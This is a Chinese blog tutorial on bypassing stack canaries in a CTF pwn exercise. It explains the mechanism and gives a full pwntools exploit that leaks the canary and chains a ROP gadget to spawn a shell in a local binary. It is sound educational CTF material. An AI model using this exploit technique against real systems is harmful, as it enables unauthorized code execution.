最简单的入门canary绕过

原创 已于 2025-05-12 10:03:33 修改 · 192 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全

于 2025-05-11 23:51:49 首次发布

一.canary的基本原理

来讲一下canary简单题目的基本思路,首先先讲一下canary的基本原理

首先canary是是用来防范栈溢出的保护机制,它的位置位于函数栈之间(也就是esp和ebp之间),

实战中我们需要看canary地址和esp和ebp的距离,先来一张图来示意一下

如果我们用ida来查看的话,canary的位置一般在main函数开头位置

mov  rax, qword ptr fs:[0x28]

mov  qword ptr [rbp - 8], rax


```

canary通常存放在fs寄存器0x28的位置,%rbp-0x8的位置

直接上实战

我们直接拿ctf Wiki的canary的例题来看:

https://ctf-wiki.org/pwn/linux/user-mode/mitigation/canary/

一般canary相关的题目,在main函数中可以发现

v3=__readfsword(0x28)  #canary 位于fs寄存器0x28的位置__

v3=__readfsword(0x28)
return __readfsword(0x28)

- `__readfsqword(0x28u)`从FS段寄存器的偏移量`0x28`处读取一个随机值(Canary),存入局部变量`v3`。
- **函数返回前**会通过`__readfsqword(0x28u) ^ v3`验证Canary是否被修改。若不一致(如栈溢出覆盖了Canary),程序会触发`__stack_chk_fail`终止运行

在实战中,当我们试图用栈溢出覆盖缓冲区时,如果没有绕过canary,canary原来的值就会变化,之后检查canary的值的时候发现canary的值被改变,行___stack_chk_fail函数,就会提前退出程序。

所以基本上来说我们在实战中,要先到canary的值,并且在合适的位置绕过它,覆盖canary的值,最终跳转自己的目标函数

二.实战

所以我们第一步就是:绕过canary

通过分析ida,我们可以看到

unsigned __int64 vuln()
{
  signed int i; // [rsp+Ch] [rbp-74h]
  char buf; // [rsp+10h] [rbp-70h]
  unsigned __int64 v3; // [rsp+78h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  for ( i = 0; i <= 1; ++i )
  {
    read(0, &buf, 0x200uLL);
    printf(&buf, &buf);
  }
  return __readfsqword(0x28u) ^ v3;
}

这里v3就是canary,v3距离rbp为0x8,buf距离rbp为0x70 ,那么我们可以输入 0x70-0x8=0x68的字符串来泄露canary的值,

首先来泄露canary的值

```

payload = b'a'*0x68
p.recvuntil("Hello radish!")
p.sendline(payload)
p.recvuntil(b'a'*0x68+'\n')
canary = u64(p.recv(7).ljust(8,'\x00'))#这里canary的末尾是\x00结尾的
print("canary=====>",hex(canary))


```

然后我们来在绕过的基础上跳转目标地址

payload = 'a'*104 + p64(canary) + 'a'*8 + p64(pop_rdi_ret) + p64(0) + p64(binsh)

 最后完整的exp

from pwn import *
#context.log_level = 'debug'
p = process("./pwn1")

pop_rdi_ret = 0x0400923
binsh = 0x040077d

print("========CANARY_LEAK=========")
payload = 'a'*0x68
p.recvuntil("Hello radish!")
p.sendline(payload)
p.recvuntil('a'*0x68+'\n')
canary = u64(p.recv(7).ljust(8,'\x00'))
print("canary=====>",hex(canary))

print("========GET_SHELL=========")
payload = 'a'*0x68 + p64(canary) + 'a'*8 + p64(pop_rdi_ret) + p64(0) + p64(binsh)
p.sendline(payload)

p.interactive()

暗流者
关注
canary入门小总结(遇到的新题型:jarvis oj pwn smashes解题以及一些基础了解)
ins_Digger的博客
11-01 971
今天的我还是在做pwn题,没怎么看书。本来今天打算做picoCTF的pwn题的,无奈怎么也连不上它的shell。(难受)然后去Jarvis OJ 做pwn题去了。 题目挑着做,总共只做了两题。第一题是简单的栈溢出。第二题就很有趣了,是我没遇过的题 看网上大神们写的writeup叫做canary。 做完题目后稍微去搜索了一下关于这种题目的资料。(这里吐槽一下有些写writeup的博主,本来就是新手题...
PWN入门学习
qq_20254219的博客
10-20 2929
基础PWN知识入门 二进制基础 ​ 从C源代码到可执行文件的生成过程 ​ 可执行文件广义上的可执行文件,文件本身是没有执行权限的,和用户权限无关。可以通过命令给文件赋权。 ELF的执行​ 需要将在磁盘上的程序载入内存中。 在磁盘中的是节,映射到内存就是段。 在执行过程中,存储在磁盘中具有相同权限的节会被映射到内存中合成一个段。进程虚拟地址空间​ 操作系统管理所有硬件,程序
PWN-canary学习
苗_的博客
02-10 1718
先简单介绍一下canaryCanary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8...
CTF-pwn 技术总结,二进制漏洞挖掘---安全机制绕过
键盘的起始页
04-01 1593
学习linux pwn,linux安全机制的知识是绕不开的。如果能理解这些安全机制的原理以及不懂得如何绕过它们,那么在比赛时将你举步维艰,本节我就总结了所有linux安全机制的基本原理以及具体的绕过方法,希望能帮助一些小萌新更快入门,帮助需要进阶的朋友打好根基。
PWN——canary问题
ysy___ysy的博客
09-16 1462
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让 shellcode 能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。
Canary
Sean_summer的博客
03-18 489
Canary是一种用以防护栈溢出的保护机制。
PWN——三种绕过canary的方法
Pr0b1em的博客
12-11 516
由于canary保护就是在距离EBP一定距离的栈帧中,用于验证是否程序有构造缓冲区的危险。而canary所在的位置一般也都在EBP-8的位置上存储着,因此 只要有机会泄露canary的位置,我们便有机会溢出程序。
ctfshow pwn入门20
最新发布
03-19
比如pwn01可能是一个简单的栈溢出,不需要绕过canary或者ASLR。而pwn02可能涉及到一些基础漏洞利用,用户提到他们自己做出了第一道pwn题,可能在解题过程中遇到了环境配置、工具使用的问题,比如如何用pwntools编写...
【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 6332
【CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
【Magisk 面具全攻略】:从入门到精通,10大技巧助你玩转Android系统
[【Magisk 面具全攻略】:从入门到精通,10大技巧助你玩转Android系统](https://i0.wp.com/www.auxx.me/wp-content/uploads/2021/01/Magisk-Root-Guide.jpg?w=1024&ssl=1) 参考资源链接:[Magisk全版本资源下载:含...
canary
03-06
金丝雀计划 这是一个游戏引擎。 理论上。 实际上,这是从头开始用C ++编写多平台游戏引擎的学习练习。 如果无法解决问题,那么我知道我可能对此类事情不感兴趣。 因此,“金丝雀”。 OpenGL 4 / ES 2.0进行渲染 OpenAL声音 支持Windows,Linux,Raspberry Pi(低优先级) 应该被认为是一个研究项目,当我需要继续进行更复杂的事情或不再有用时,该研究项目便会结束。 否则我会觉得无聊。 两者任一。
Canary学习(泄露Canary
至臻求学,胸怀云月
01-30 6223
canary 原理 通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp,eip等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址让shellcode执行。 当启用栈保护时,函数开始执行的时候会先往栈底插入cookie信息,如果不合法就停止程序运行(栈溢出发生)。攻击者在覆盖返回地址的时候...
Canary 学习
H1zerguo的博客
10-04 808
pwn_Canary
泄露canary
九层台
07-17 1744
题目链接https://pan.baidu.com/s/1CRhWOys3tbRr_uBqRhewsQ 有NX和canary保护。 char v21[257]; // [esp+2Bh] [ebp-10Dh] v21设置了257个字节的空间。 sub_80486FD(dest, 0x200u); v12 = 0; v13 = 0; while ( dest[v12] ...
canary介绍与绕过技巧
0pt1mus
04-02 8582
Canary 介绍 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当...
栈保护者Canary的实现细节
哈哈哈哈哈哈哈哈的博客
04-16 2026
1.示例copy函数 汇编代码: 失去栈保护的汇编代码: 比对发现,在有栈保护的汇编代码中增加了一些指令,其中: mov %gs:0x14,%eax mov %eax,-0xc(ebp) 两句指令,是向栈中插入一个canary值。使用栈保护的copy函数栈是这样的: canary的值是随机生成的,在内存中保存有两份: ①一个是保存在特殊的段内,这个段被标示为只读,不可修改。 ②另一个在栈...
stack canary 的认识
guilanl的专栏
03-15 9278
在前面的博客里面,已经介绍了 stack overflow 的攻击原理,其中也设计到了 GCC 编译器的 stack canary 技术,用于预防 stack overflow. 现在再来详细了解一下stack canaries 的种类,已经他们的作用吧。 如果能在运行时检测出 stack overflow 破坏,就有可能对函数栈进行保护。目前的堆栈保护实现大多使用基于 “Cana
栈溢出——cannary绕过方法详解
qq_42882717的博客
03-14 2707
cannary绕过
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值